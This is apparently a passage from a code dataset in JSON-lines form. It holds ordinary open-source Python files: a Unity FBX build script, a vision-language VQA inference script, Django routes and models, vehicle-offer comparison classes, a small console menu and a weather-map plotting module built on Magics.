verbose')\nparser.add_argument('--yamato', action='store_true', dest='yamato_build', help='Used internally for CI')\nargs = parser.parse_args()\n\ncurdir = os.path.dirname(os.path.abspath(__file__))\nbuilddir = os.path.join(curdir, 'build')\n\n# Clean the build?\nif args.clean_build and os.path.exists(builddir):\n print(\"Deleting build directory..\")\n shutil.rmtree(builddir)\n\nif not os.path.exists(builddir):\n os.mkdir(builddir)\n\n# Set the executable name\nif sys.platform.startswith('win'):\n shell = True\n cmake_exe = 'cmake.exe'\nelse:\n cmake_exe = 'cmake'\n shell = False\n\n# Minimal configuration\nconfig_args = [\n cmake_exe,\n '..', # because the working directory is the \"build\" directory, go back\n '-DCMAKE_SOURCE_DIR={}'.format(curdir),\n '-DCMAKE_BUILD_TYPE={}'.format(args.build_type), \n '-DCMAKE_INSTALL_PREFIX={}'.format(os.path.join(builddir, 'install')),\n '-DCMAKE_OSX_ARCHITECTURES=arm64',\n ]\n\n# Where to find swig if not standard install\nif args.swig_location is not None:\n config_args.append('-DSWIG_EXECUTABLE={}'.format(args.swig_location))\n # config_args.append(args.swig_location)\nif args.fbxsdk_location is not None:\n config_args.append('-DFBXSDK_ROOT_PATH={}'.format(args.fbxsdk_location))\n\n# Use Stevedore?\nconfig_args.append('-DUSE_STEVEDORE' + ('=ON' if args.use_stevedore else '=OFF'))\n\n# Is a CI build?\nconfig_args.append('-DYAMATO' + ('=ON' if args.yamato_build else '=OFF'))\n\n# Generator selection\nconfig_args.append('-G')\nif args.use_ninja:\n config_args.append('Ninja')\nelse:\n if sys.platform.startswith('win'):\n config_args.append('Visual Studio 16 2019')\n config_args.append('-Ax64')\n else:\n config_args.append('Unix Makefiles')\n\n# Remove this if you're a build system dev\nconfig_args.append('-Wno-dev')\n\n# Do the config\nprint(' '.join(config_args))\nretcode = subprocess.check_call(config_args, stderr=subprocess.STDOUT, shell=shell, cwd=builddir)\n\nif retcode != 0:\n sys.exit(retcode)\n\n# And do the build\nbuild_args= [\n cmake_exe,\n '--build',\n '.',\n '--target',\n 'install',\n '--config',\n args.build_type\n]\n\nif args.verbose_build and (args.use_ninja or sys.platform.startswith('win')):\n build_args.append('--verbose')\n\nenv = None\n# Mac and Linux SWIG were compiled and have hard coded paths to swig.swg.\n# Set the correct location in the environment for the build, since the\n# configure is able to set it for itself.\nif args.use_stevedore and not sys.platform.startswith('win'):\n\n env = os.environ\n def find(name, path):\n '''\n https://stackoverflow.com/a/1724723\n '''\n for root, dirs, files in os.walk(path):\n if name in files:\n # we need only the directory\n return root\n env[\"SWIG_LIB\"] = find('swig.swg', builddir)\n\n\nprint(build_args)\nretcode = subprocess.check_call(build_args, stderr=subprocess.STDOUT, shell=shell, cwd=builddir, env=env)\n\nif retcode != 0:\n sys.exit(retcode)\n\nif sys.platform.startswith('darwin'):\n # On Mac build two binaries (one that works on arm and one x86_64 that works on 10.13+).\n # The arm binary is already built, here we build the second one and combine the two with lipo\n \n # use a different build directory\n builddir_legacy = os.path.join(curdir, 'build_legacy_mac')\n \n if args.clean_build and os.path.exists(builddir_legacy):\n shutil.rmtree(builddir_legacy)\n\n if not os.path.exists(builddir_legacy):\n os.mkdir(builddir_legacy)\n \n install_prefix = '-DCMAKE_INSTALL_PREFIX={}'.format(os.path.join(builddir_legacy, 'install'))\n \n # use all the same config args except the 
install prefix\n config_args = [a for a in config_args if not (a.startswith(\"-DCMAKE_INSTALL_PREFIX\") or a.startswith(\"-DCMAKE_OSX_ARCHITECTURES\"))] \n config_args.append(install_prefix)\n config_args.append('-DCMAKE_OSX_ARCHITECTURES=x86_64')\n retcode = subprocess.check_call(config_args, stderr=subprocess.STDOUT, shell=shell, cwd=builddir_legacy)\n\n if retcode != 0:\n sys.exit(retcode)\n\n retcode = subprocess.check_call(build_args, stderr=subprocess.STDOUT, shell=shell, cwd=builddir_legacy, env=env)\n if retcode != 0:\n sys.exit(retcode)\n\n # combine the arm build and the legacy build with lipo\n bundle_path = \"install/com.autodesk.fbx/Editor/Plugins/UnityFbxSdkNative.bundle/Contents/MacOS/UnityFbxSdkNative\"\n bundle_name = \"UnityFbxSdkNative\"\n arm_bundle = os.path.join(builddir, bundle_path)\n legacy_bundle = os.path.join(builddir_legacy, bundle_path)\n lipo_call = [\"lipo\", \"-create\", \"-output\", bundle_name, arm_bundle, legacy_bundle]\n retcode = subprocess.check_call(lipo_call, stderr=subprocess.STDOUT, shell=shell, cwd=curdir, env=env)\n if retcode != 0:\n sys.exit(retcode)\n \n # replace the arm bundle with the universal binary\n src = os.path.join(curdir, bundle_name)\n dst = arm_bundle\n shutil.copyfile(src, dst)\n\nsys.exit(retcode)","repo_name":"Unity-Technologies/com.autodesk.fbx","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":5940,"program_lang":"python","lang":"en","doc_type":"code","stars":202,"dataset":"github-code","pt":"76"} +{"seq_id":"69824376246","text":"import argparse\nimport json\nimport os\nfrom os.path import exists\nfrom time import time\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom apex import amp\nfrom horovod import torch as hvd\nimport numpy as np\nfrom cytoolz import concat\n\nfrom data import (TokenBucketSampler, PrefetchLoader,\n DetectFeatLmdb, TxtTokLmdb, VqaEvalDataset, vqa_eval_collate)\nfrom model.vqa import UniterForVisualQuestionAnswering\n\nfrom utils.logger import LOGGER\nfrom utils.distributed import all_gather_list\nfrom utils.misc import Struct\nfrom utils.const import BUCKET_SIZE, IMG_DIM\n\n\ndef main(opts):\n hvd.init()\n n_gpu = hvd.size()\n device = torch.device(\"cuda\", hvd.local_rank())\n torch.cuda.set_device(hvd.local_rank())\n rank = hvd.rank()\n LOGGER.info(\"device: {} n_gpu: {}, rank: {}, \"\n \"16-bits training: {}\".format(\n device, n_gpu, hvd.rank(), opts.fp16))\n\n hps_file = f'{opts.output_dir}/log/hps.json'\n model_opts = Struct(json.load(open(hps_file)))\n\n # train_examples = None\n ans2label_file = f'{opts.output_dir}/ckpt/ans2label.json'\n ans2label = json.load(open(ans2label_file))\n label2ans = {label: ans for ans, label in ans2label.items()}\n\n # load DBs and image dirs\n eval_img_db = DetectFeatLmdb(opts.img_db,\n model_opts.conf_th, model_opts.max_bb,\n model_opts.min_bb, model_opts.num_bb,\n opts.compressed_db)\n eval_txt_db = TxtTokLmdb(opts.txt_db, -1)\n eval_dataset = VqaEvalDataset(len(ans2label), eval_txt_db, eval_img_db)\n\n # Prepare model\n if exists(opts.checkpoint):\n ckpt_file = opts.checkpoint\n else:\n ckpt_file = f'{opts.output_dir}/ckpt/model_step_{opts.checkpoint}.pt'\n checkpoint = torch.load(ckpt_file)\n model = UniterForVisualQuestionAnswering.from_pretrained(\n f'{opts.output_dir}/log/model.json', checkpoint,\n img_dim=IMG_DIM, num_answer=len(ans2label))\n model.to(device)\n if opts.fp16:\n model = amp.initialize(model, enabled=True, opt_level='O2')\n\n sampler = TokenBucketSampler(eval_dataset.lens, 
bucket_size=BUCKET_SIZE,\n batch_size=opts.batch_size, droplast=False)\n eval_dataloader = DataLoader(eval_dataset,\n batch_sampler=sampler,\n num_workers=opts.n_workers,\n pin_memory=opts.pin_mem,\n collate_fn=vqa_eval_collate)\n eval_dataloader = PrefetchLoader(eval_dataloader)\n\n val_log, results, logits = evaluate(model, eval_dataloader, label2ans,\n opts.save_logits)\n result_dir = f'{opts.output_dir}/results_test'\n if not exists(result_dir) and rank == 0:\n os.makedirs(result_dir)\n\n all_results = list(concat(all_gather_list(results)))\n if opts.save_logits:\n all_logits = {}\n for id2logit in all_gather_list(logits):\n all_logits.update(id2logit)\n if hvd.rank() == 0:\n with open(f'{result_dir}/'\n f'results_{opts.checkpoint}_all.json', 'w') as f:\n json.dump(all_results, f)\n if opts.save_logits:\n np.savez(f'{result_dir}/logits_{opts.checkpoint}_all.npz',\n **all_logits)\n\n\n@torch.no_grad()\ndef evaluate(model, eval_loader, label2ans, save_logits=False):\n LOGGER.info(\"start running evaluation...\")\n model.eval()\n n_ex = 0\n st = time()\n results = []\n logits = {}\n for i, batch in enumerate(eval_loader):\n qids = batch['qids']\n scores = model(batch, compute_loss=False)\n answers = [label2ans[i]\n for i in scores.max(dim=-1, keepdim=False\n )[1].cpu().tolist()]\n for qid, answer in zip(qids, answers):\n results.append({'answer': answer, 'question_id': int(qid)})\n if save_logits:\n scores = scores.cpu()\n for i, qid in enumerate(qids):\n logits[qid] = scores[i].half().numpy()\n if i % 100 == 0 and hvd.rank() == 0:\n n_results = len(results)\n n_results *= hvd.size() # an approximation to avoid hangs\n LOGGER.info(f'{n_results}/{len(eval_loader.dataset)} '\n 'answers predicted')\n n_ex += len(qids)\n n_ex = sum(all_gather_list(n_ex))\n tot_time = time()-st\n val_log = {'valid/ex_per_s': n_ex/tot_time}\n model.train()\n LOGGER.info(f\"evaluation finished in {int(tot_time)} seconds \"\n f\"at {int(n_ex/tot_time)} examples per second\")\n return val_log, results, logits\n\n\ndef compute_score_with_logits(logits, labels):\n logits = torch.max(logits, 1)[1] # argmax\n one_hots = torch.zeros(*labels.size(), device=labels.device)\n one_hots.scatter_(1, logits.view(-1, 1), 1)\n scores = (one_hots * labels)\n return scores\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n # Required parameters\n parser.add_argument(\"--txt_db\",\n default=None, type=str,\n help=\"The input train corpus. 
(LMDB)\")\n parser.add_argument(\"--img_db\",\n default=None, type=str,\n help=\"The input train images.\")\n parser.add_argument('--compressed_db', action='store_true',\n help='use compressed LMDB')\n parser.add_argument(\"--checkpoint\",\n default=None, type=str,\n help=\"can be the path to binary or int number (step)\")\n parser.add_argument(\"--batch_size\",\n default=8192, type=int,\n help=\"number of tokens in a batch\")\n\n parser.add_argument(\"--output_dir\", default=None, type=str,\n help=\"The output directory of the training command\")\n\n parser.add_argument(\"--save_logits\", action='store_true',\n help=\"Whether to save logits (for making ensemble)\")\n\n # Prepro parameters\n\n # device parameters\n parser.add_argument('--fp16',\n action='store_true',\n help=\"Whether to use 16-bit float precision instead \"\n \"of 32-bit\")\n parser.add_argument('--n_workers', type=int, default=4,\n help=\"number of data workers\")\n parser.add_argument('--pin_mem', action='store_true',\n help=\"pin memory\")\n\n args = parser.parse_args()\n\n main(args)\n","repo_name":"ChenRocks/UNITER","sub_path":"inf_vqa.py","file_name":"inf_vqa.py","file_ext":"py","file_size_in_byte":6578,"program_lang":"python","lang":"en","doc_type":"code","stars":752,"dataset":"github-code","pt":"76"} +{"seq_id":"23215401364","text":"from django.urls import path\nfrom portfolio_app.api.views import PortfolioListCreateView,PortfolioRetriveUpdateDestroyView,HoldingListCreateView,HolidingRetriveUpdateDestroyView\n\nurlpatterns = [\n path('portfolio/',PortfolioListCreateView.as_view(),name ='portfolio-list'),\n path('portfolio//', PortfolioRetriveUpdateDestroyView.as_view(),name = 'portfolio-detail'),\n path('portfolio//holdings/',HoldingListCreateView.as_view(),name = 'holdings'),\n path('portfolio//holdings//', HolidingRetriveUpdateDestroyView.as_view(),name = 'holding-details')\n \n]\n","repo_name":"kashyap21/stock_project","sub_path":"portfolio_app/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30093344066","text":"from django.core.validators import MaxValueValidator, MinValueValidator\nfrom django.db import models\nfrom django.utils.translation import gettext as _\n\nfrom apps.ideas import fields as custom_fields\n\nTOTAL_BUDGET_HELP = _('Please indicate your overall budget. '\n 'The total budget may (but does not '\n 'have to) include the applicant’s own '\n 'contribution and/or external sources '\n 'of funding. Please only enter whole '\n 'numbers, no decimal signs like points, '\n 'commas or spaces. This section will be '\n 'published in the idea space.')\n\nBUDGET_REQUESTED_HELP = _('Funding requested from Civic Europe '\n 'can range from 1 to 35000 EUR. Depending '\n 'on your planning, the amount entered here '\n 'can be the same as the “total budget” '\n 'figure entered above. This section will be '\n 'published in the idea space.')\n\nMAJOR_EXPENSES_HELP = _('What are the major expenses you foresee for the '\n 'implementation of your idea? Please share a rough '\n 'estimate by cost category (e.g. office expenses '\n '1000 EUR, travel and accommodation costs 3000 EUR, '\n 'public relations 2000 EUR, personnel costs etc.) 
'\n 'This section will be published in the idea space.')\n\nDURATION_HELP = _('How many months will it take to implement your idea?')\n\n\nclass FinancesSection(models.Model):\n total_budget = custom_fields.CustomIntegerField(\n verbose_name=_('Total budget'),\n help_text=TOTAL_BUDGET_HELP,\n validators=[\n MinValueValidator(0)\n ]\n )\n budget_requested = custom_fields.CustomIntegerField(\n verbose_name=_('Funding requested from Civic Europe'),\n help_text=BUDGET_REQUESTED_HELP,\n validators=[\n MaxValueValidator(35000),\n MinValueValidator(0)\n ]\n )\n major_expenses = models.TextField(\n max_length=500,\n verbose_name=_('Major expenses'),\n help_text=MAJOR_EXPENSES_HELP\n )\n duration = custom_fields.CustomIntegerField(\n verbose_name=_('Duration of idea (number of months)'),\n help_text=DURATION_HELP\n )\n\n class Meta:\n abstract = True\n","repo_name":"liqd/a4-civic-europe","sub_path":"apps/ideas/models/sections/finances_section.py","file_name":"finances_section.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"1853140273","text":"\n\n\nclass ComparisonClients():\n def __init__(self,Group1 ,Group2):\n self.ClientID = [Group1.ClientID, Group2.ClientID]\n self.Name = [Group1.Name, Group2.Name]\n self.Location = [Group1.Location, Group2.Location]\n self.Phone = [Group1.Phone, Group2.Phone]\n self.Website = [Group1.Website, Group2.Website]\n self.IsActive = [Group1.IsActive, Group2.IsActive]\n\n self.Vehicles = []\n self.Batches = []\n\nclass ComparisonBatches():\n def __init__(self,Group1 ,Group2):\n self.ClientID = [Group1.ClientID, Group2.ClientID]\n self.MaxBatchID = [Group1.MaxBatchID, Group2.MaxBatchID]\n self.ExportJobEndDT = [Group1.ExportJobEndDT, Group2.ExportJobEndDT]\n self.JobYear = [Group1.JobYear, Group2.JobYear]\n self.JobMonth = [Group1.JobMonth, Group2.JobMonth]\n self.JobDay = [Group1.JobDay, Group2.JobDay]\n self.JobHour = [Group1.JobHour, Group2.JobHour]\n self.LocalTime = [Group1.LocalTime, Group2.LocalTime]\n self.CurrentYear = [Group1.CurrentYear, Group2.CurrentYear]\n self.CurrentMonth = [Group1.CurrentMonth, Group2.CurrentMonth]\n self.CurrentDay = [Group1.CurrentDay, Group2.CurrentDay]\n self.CurrentHour = [Group1.CurrentHour, Group2.CurrentHour]\n\n\nclass ComparisonVehiclesOffers():\n def __init__(self,**kwargs):\n self.ClientID = kwargs['ClientID']\n self.DealerID = kwargs['DealerID']\n self.VehicleID = kwargs['VehicleID']\n self.BatchID = kwargs['BatchID']\n self.StockNumber = kwargs['StockNumber']\n self.VIN = kwargs['VIN']\n self.DealerCode = kwargs['DealerCode']\n self.State = kwargs['State']\n self.County = kwargs['County']\n self.ZipCode = kwargs['ZipCode']\n\n self.MakeName = kwargs['BrandName']\n self.ModelName = kwargs['Model']\n self.ModelNumber = kwargs['ModelNumber']\n self.Trim = kwargs['Trim']\n self.Year = kwargs['Year']\n self.Invoice = kwargs['Invoice']\n self.SellingPrice = kwargs['SellingPrice']\n self.MSRP = kwargs['MSRP']\n self.DealerPrice = kwargs['DealerPrice']\n self.PriceOption = kwargs['PriceOption']\n\n self.StockType = kwargs['StockType']\n self.Payment = kwargs['Payment']\n self.BasePayment = kwargs['BasePayment']\n self.PaymentNoTax = kwargs['PaymentNoTax']\n self.Lender = kwargs['Lender']\n self.Mileage = kwargs['Mileage']\n self.Term = kwargs['Term']\n self.DownPayment = kwargs['Downpayment']\n self.DueAtSigning = kwargs['DueAtSigning']\n self.TotalRebate = kwargs['TotalRebate']\n self.OfferTypeID = kwargs['OfferTypeID']\n 
self.OfferType = kwargs['OfferType']\n self.Disclaimer = kwargs['Disclaimer']\n self.APR = kwargs['APR']\n self.OfferRank = kwargs['OfferRank']\n self.ModelRank = kwargs['ModelRank']\n self.ModelNoRank = kwargs['ModelNoRank']\n self.ClientName = kwargs['ClientName']\n self.RegistrationFee = kwargs['RegistrationFee']\n self.AcquisitionFee = kwargs['AquisitionFee']\n self.InceptionFees = kwargs['InceptionFees']\n self.OtherFees = kwargs['OtherFees']\n self.TotalRebate = kwargs['TotalRebate']\n self.MarkupRate = kwargs['MarkupRate']\n self.BuyRate = kwargs['BuyRate']\n self.SellRate = kwargs['SellRate']\n self.PaidReserve = kwargs['PaidReserve']\n self.AmountFinanced = kwargs['AmountFinanced']\n self.ResidualPercent = kwargs['ResidualPercent']\n self.ResidualDollar = kwargs['ResidualDollar']\n self.MaxAdvance = kwargs['MaxAdvance']\n self.SalesTax = kwargs['SalesTax']\n self.ProgramCode = kwargs['ProgramCode']\n self.HasOEMException = kwargs['HasOEMException']\n self.PriceChange = kwargs['PriceChange']\n self.IsCaptive = kwargs['IsCaptive']\n self.IsSpecial = kwargs['IsSpecial']\n self.IsVisible = kwargs['IsVisible']\n self.VINOffer = f'{self.VIN}{self.OfferTypeID}'\n\n\n\n def __repr__(self):\n return f\"{self.ClientID} {self.DealerID} {self.VIN} {self.OfferTypeID}\"\n\n\n\n\n\n\n","repo_name":"MorriesMarketing/OldPython","sub_path":"QualityAssuranceBot/ComparisonObject.py","file_name":"ComparisonObject.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5436830906","text":"\r\nfrom Manejador import Manejador\r\nfrom ClaseLavarropa import Lavaropa\r\nfrom ClaseObj import Object\r\nclass Menu:\r\n opcion=None\r\n \r\n def __init__(self):\r\n self.__opcion=0\r\n def mostrarmenu(self):\r\n jsonF = Object()\r\n Aparatos = Manejador()\r\n diccionario = jsonF.leerJSONArchivo('aparatoselectronicos.json')\r\n Aparatos = jsonF.decodificarDiccionario(diccionario)\r\n\r\n while self.__opcion!=-1:\r\n print('[1] Inssertar aparato en posicion especifica')\r\n print('[2] Agrega a coleccion')\r\n print('[3] Motrar')\r\n print('[4] Mostar ')\r\n print('[5] Mostrar')\r\n print('[6] Mostrar')\r\n print('[7] Almacenar')\r\n self.__opcion=input('\\nIngrese numero: ')\r\n if self.__opcion=='1':\r\n pos = int(input('Ingresar posicion donde insertara el elemento '))\r\n aparato = Aparatos.crearaparato()\r\n Aparatos.insertarElemento(aparato,pos)\r\n elif self.__opcion=='2':\r\n aparato = Aparatos.crearaparato()\r\n Aparatos.agregarElemento(aparato)\r\n elif self.__opcion=='3':\r\n posicion = int(input('Ingresar posicion '))\r\n Aparatos.mostrarElemento(posicion)\r\n elif self.__opcion=='4':\r\n Aparatos.Aparatosphillips()\r\n elif self.__opcion=='5':\r\n Aparatos.marcalavaropas()\r\n elif self.__opcion=='6':\r\n Aparatos.mostrarDatos()\r\n elif self.__opcion=='7':\r\n listaJSON = Aparatos.guardarJSON()\r\n jsonF.guardarJSONArchivo(listaJSON, 'Aparato.json')\r\n print('Archivo guardado')\r\n ","repo_name":"MoraJuan/Eje6U3","sub_path":"Menu.py","file_name":"Menu.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37437859002","text":"import tempfile\nimport os\nimport json\nimport numpy as np\nimport threading\nimport sys\nimport hashlib\nimport xarray as xr\nfrom contextlib import closing\n\nfor n in ('LD_LIBRARY_PATH', 'DYLD_LIBRARY_PATH'):\n os.environ[n] = 
'/opt/ecmwf/magics/lib:/Users/baudouin/build/magics/lib'\n\n\n# os.environ['MAGPLUS_HOME'] = '/Users/baudouin/build/magics'\n\nsys.path.append('/opt/ecmwf/magics/lib/python2.7/site-packages')\n\nfrom Magics import macro\n\n\nLOCK = threading.Lock()\n\nPROJECTIONS = {\n \"global\": macro.mmap(subpage_upper_right_longitude=180.00,\n subpage_upper_right_latitude=90.00,\n subpage_lower_left_latitude=-90.00,\n subpage_lower_left_longitude=-180.0,\n subpage_map_projection='cylindrical'),\n \"uk\": macro.mmap(subpage_upper_right_longitude=1.5,\n subpage_upper_right_latitude=60.00,\n subpage_lower_left_latitude=44.5,\n subpage_lower_left_longitude=-14.0,\n subpage_map_projection='cylindrical'),\n \"france\": macro.mmap(subpage_upper_right_longitude=10.5,\n subpage_upper_right_latitude=52.5,\n subpage_lower_left_latitude=37.0,\n subpage_lower_left_longitude=-5.0,\n subpage_map_projection='cylindrical'),\n}\n\n\nONOFF = {False: 'off',\n True: 'on'}\n\n\ndef identity(x):\n return x\n\n\ndef as_plottable(field, position=0, metadata=None, preproc=None):\n\n # print('as_plottable', preproc)\n\n if isinstance(field, str):\n grib = macro.mgrib(grib_input_file_name=field,\n grib_file_address_mode='byte_offset',\n grib_field_position=position)\n return grib, None, metadata, 'path'\n\n if hasattr(field, 'path') and hasattr(field, 'offset') and hasattr(field, 'area'):\n grib = macro.mgrib(grib_input_file_name=field.path,\n grib_file_address_mode='byte_offset',\n grib_field_position=int(field.offset))\n return grib, field.area, metadata, 'gridfield'\n\n if isinstance(field, xr.DataArray):\n if metadata is None:\n metadata = {}\n grib = {}\n for k, v in field.attrs.items():\n if k.startswith('GRIB_'):\n grib[k[5:]] = str(v)\n else:\n metadata[k] = str(v)\n\n # Only key GRIB\n if grib:\n metadata = grib\n\n n, w, s, e = float(field.latitude[0]), float(field.longitude[0]), float(field.latitude[-1]), float(field.longitude[-1])\n ns = float(field.latitude[1]) - float(field.latitude[0])\n ew = float(field.longitude[1]) - float(field.longitude[0])\n\n grib = macro.minput(input_field=field.values,\n input_field_initial_latitude=n,\n input_field_latitude_step=ns,\n input_field_initial_longitude=w,\n input_field_longitude_step=ew,\n input_metadata=metadata,)\n return grib, (n, w, s, e), metadata, 'xarray'\n\n if hasattr(field, 'array'):\n ew, ns = field.grid\n n, w, s, e = field.area\n if metadata is None:\n metadata = field.metadata\n\n if preproc:\n f = preproc\n else:\n f = identity\n\n grib = macro.minput(input_field=f(field.array),\n input_field_initial_latitude=float(n),\n input_field_latitude_step=-float(ns),\n input_field_initial_longitude=float(w),\n input_field_longitude_step=float(ew),\n input_metadata=metadata,)\n return grib, (n, w, s, e), metadata, 'bespoke'\n\n if isinstance(field, np.ndarray):\n class F:\n def __init__(self, f):\n self.array = f\n self.grid = metadata['grid']\n self.area = metadata['area']\n\n return as_plottable(F(field), metadata=metadata, preproc=preproc)\n\n if isinstance(field, list):\n if isinstance(position, list):\n return [as_plottable(f, p, metadata) for (f, p) in zip(field, position)]\n else:\n return [as_plottable(f, 0, metadata) for f in field]\n\n raise ValueError(\"Cannot plot %s\" % (type(field), ))\n\n\ndef make_contour(contour, legend):\n\n if isinstance(contour, list):\n return [make_contour(c, legend) for c in contour]\n\n if contour is not None:\n if isinstance(contour, str):\n return macro.mcont(contour_automatic_setting='ecmwf',\n legend=legend,\n 
contour_style_name=contour,)\n else:\n d = dict(**contour)\n d['legend'] = legend\n return macro.mcont(**d)\n else:\n return macro.mcont(contour_automatic_setting='ecmwf', legend=legend,)\n\n\ndef plot_to_file(field,\n file,\n size=10.,\n projection=None,\n contour=None,\n grid=True,\n title=True,\n title_text='Title',\n width=400,\n ratio=1.0,\n area=None,\n metadata=None,\n text_format='(automatic)',\n position=0,\n format=None,\n preproc=None,\n legend=False,\n boxes=[]):\n\n plottable = as_plottable(field, position, metadata, preproc)\n if isinstance(plottable, list):\n _, in_file_area, metadata, what = plottable[0]\n grib = [g[0] for g in plottable]\n else:\n grib, in_file_area, metadata, what = plottable\n\n # print(\"XXXX PLOT\", what, \"metadata =>\", metadata,\n # \"contour => \", contour,\n # \"area =>\", area)\n\n if projection is None:\n if area is None:\n area = in_file_area\n\n if area:\n n, w, s, e = area\n projection = macro.mmap(subpage_upper_right_longitude=float(e),\n subpage_upper_right_latitude=float(n),\n subpage_lower_left_latitude=float(s),\n subpage_lower_left_longitude=float(w),\n subpage_map_projection='cylindrical')\n else:\n projection = macro.mmap(subpage_map_projection='cylindrical')\n\n if isinstance(projection, str):\n projection = PROJECTIONS[projection]\n\n contour = make_contour(contour, legend)\n\n if isinstance(grib, list) and not isinstance(contour, list):\n contour = [contour] * len(grib)\n\n base, ext = os.path.splitext(file)\n if format is None:\n format = ext[1:]\n output = macro.output(output_formats=[format],\n output_name_first_page_number='off',\n page_x_length=float(size),\n page_y_length=float(size) * ratio,\n super_page_x_length=float(size),\n super_page_y_length=float(size) * ratio,\n subpage_x_length=float(size),\n subpage_y_length=float(size) * ratio,\n subpage_x_position=0.,\n subpage_y_position=0.,\n output_width=width,\n page_frame='on',\n page_id_line='off',\n output_name=base)\n\n foreground = macro.mcoast(map_grid=ONOFF[grid],\n map_label='off')\n\n background = macro.mcoast(map_grid=ONOFF[grid],\n map_grid_colour='tan',\n map_label='off',\n map_coastline_land_shade='on',\n map_coastline_land_shade_colour='cream',\n map_coastline_colour='tan')\n data = []\n data.append(background)\n\n if isinstance(grib, list):\n for g, c in zip(grib, contour):\n data.append(g)\n data.append(c)\n else:\n data.append(grib)\n data.append(contour)\n\n data.append(foreground)\n\n bb = float(len(boxes) + 1)\n for i, b in enumerate(boxes):\n inc = 0.1\n n, w, s, e = b\n a = np.ones(((e - w + inc) / inc - 2, ((n - s + inc) / inc) - 2))\n a = np.pad(a, 1, 'constant', constant_values=0)\n\n b = macro.minput(input_field=a,\n input_field_initial_latitude=float(n),\n input_field_latitude_step=-float(inc),\n input_field_initial_longitude=float(w),\n input_field_longitude_step=float(inc),\n input_metadata={})\n data.append(b)\n # print a.shape\n\n d = \"rgba(1,0,0,%g)\" % (i / bb)\n\n c = macro.mcont(contour=\"off\",\n contour_shade=\"on\",\n contour_shade_method=\"area_fill\",\n contour_shade_max_level_colour=d,\n contour_shade_min_level_colour=d,)\n\n data.append(c)\n\n if title:\n data.append(macro.mtext())\n\n if legend:\n width = 1000\n height = 200\n width_cm = float(width) / 40.\n height_cm = float(height) / 40.\n output = macro.output(output_formats=[format],\n output_name_first_page_number='off',\n # output_cairo_transparent_background='on',\n output_width=width,\n super_page_x_length=width_cm,\n super_page_y_length=height_cm,\n output_name=base,\n 
subpage_frame=False,\n page_frame=False,\n page_id_line=False)\n\n leg = macro.mlegend(\n legend_title=\"on\",\n legend_title_font_size=1.1,\n legend_display_type=\"continuous\",\n legend_title_text=title_text,\n legend_text_colour=\"charcoal\",\n legend_box_mode=\"positional\",\n legend_text_format=text_format,\n legend_box_x_position=0.00,\n legend_box_y_position=0.00,\n legend_box_x_length=width_cm,\n legend_box_y_length=height_cm,\n legend_box_blanking=\"on\",\n legend_text_font_size=\"15%\",\n legend_border=False,\n legend_border_colour=\"rgb(0.18,0.18,0.62)\"\n )\n\n with LOCK:\n # print(output, data[1], data[2], leg)\n macro.plot(output, data[1], data[2], leg)\n return\n\n data.append(macro.page())\n\n # print(output, projection, data)\n\n with LOCK:\n macro.plot(output, projection, data)\n\n\ndef cached_plot(field, cache, format='png', key=None, **kwargs):\n\n if key is None:\n key = dict(field=field, kwargs=kwargs)\n key = json.dumps(key, sort_keys=True)\n key = hashlib.md5(key.encode('utf-8')).hexdigest()\n\n result = os.path.join(cache, key + '.' + format)\n if not os.path.exists(result):\n\n if format == 'grib':\n from grib import GribFile\n offset = kwargs['position']\n length = GribFile(field).at_offset(offset).totalLength\n with open(field, 'rb') as f:\n f.seek(offset)\n try:\n with open(result, 'wb') as g:\n g.write(f.read(length))\n except Exception:\n if os.path.exists(result):\n os.path.unlink(result)\n raise\n\n else:\n plot_to_file(field, result, **kwargs)\n\n return result\n\n\ndef plot_open(field, cache=None, **kwargs):\n\n if cache:\n return open(cached_plot(field, cache, **kwargs))\n\n fd, tmp = tempfile.mkstemp('.' + kwargs.get(\"format\", \"png\"))\n os.close(fd)\n\n print(tmp, field)\n plot_to_file(field, tmp, **kwargs)\n\n f = open(tmp, 'rb')\n\n os.unlink(tmp)\n\n return f\n\n\ndef plot(field, save=None, **kwargs):\n\n if save:\n plot_to_file(field, save, **kwargs)\n\n from IPython.display import Image\n\n fd, tmp = tempfile.mkstemp('.' 
+ kwargs.get(\"format\", \"png\"))\n os.close(fd)\n\n plot_to_file(field, tmp, **kwargs)\n img = Image(tmp)\n\n os.unlink(tmp)\n\n return img\n\n\ndef plot_from_data(data, format='png'):\n\n class Plottable:\n\n def __init__(self, values, shape, metadata, **kwargs):\n self.array = np.reshape(np.array(values), tuple(shape))\n self.area = metadata.pop('area')\n self.grid = metadata.pop('grid')\n self.metadata = metadata\n\n field = Plottable(**data)\n contour = data.get(\"metadata\", {}).get(\"contour\")\n\n if 'field2' in data:\n data2 = data['field2']\n field = [field, Plottable(**data2)]\n contour = [contour, data2.get(\"metadata\", {}).get(\"contour\")]\n\n if data.get('zindex', 0) > data2.get('zindex', 0):\n field = [field[1], field[0]]\n contour = [contour[1], contour[0]]\n\n with closing(plot_open(field, contour=contour, format=format)) as f:\n return f.read()\n\n\nif __name__ == '__main__':\n from collections import namedtuple\n import resource\n size = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss\n print('size', size / 1024, 'mb')\n\n for n in range(0, 20):\n\n Field = namedtuple('Field', ['array',\n 'area',\n 'first_latitude',\n 'latitude_increment',\n 'first_longitude',\n 'longitude_increment',\n 'metadata'])\n field = Field(np.random.rand(32, 32) * 10.0 + 273.15,\n [60.0, -14.0, 44.5, 1.5],\n 60.0,\n 1.5,\n -14.0,\n 1.5,\n dict(level=2,\n marsClass='ei',\n marsStream='oper',\n marsType='an',\n paramId=167,\n typeOfLevel='surface',\n units='K'))\n\n plot_to_file(field, 'test.png')\n newsize = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss\n print('increment', (newsize - size) / 1024, 'mb')\n size = newsize\n print('size', size / 1024, 